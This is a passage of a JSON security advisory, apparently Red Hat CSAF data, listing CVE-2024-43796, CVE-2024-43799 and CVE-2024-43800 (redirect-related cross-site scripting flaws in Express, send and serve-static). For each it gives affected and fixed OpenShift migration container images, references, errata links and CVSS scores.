"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
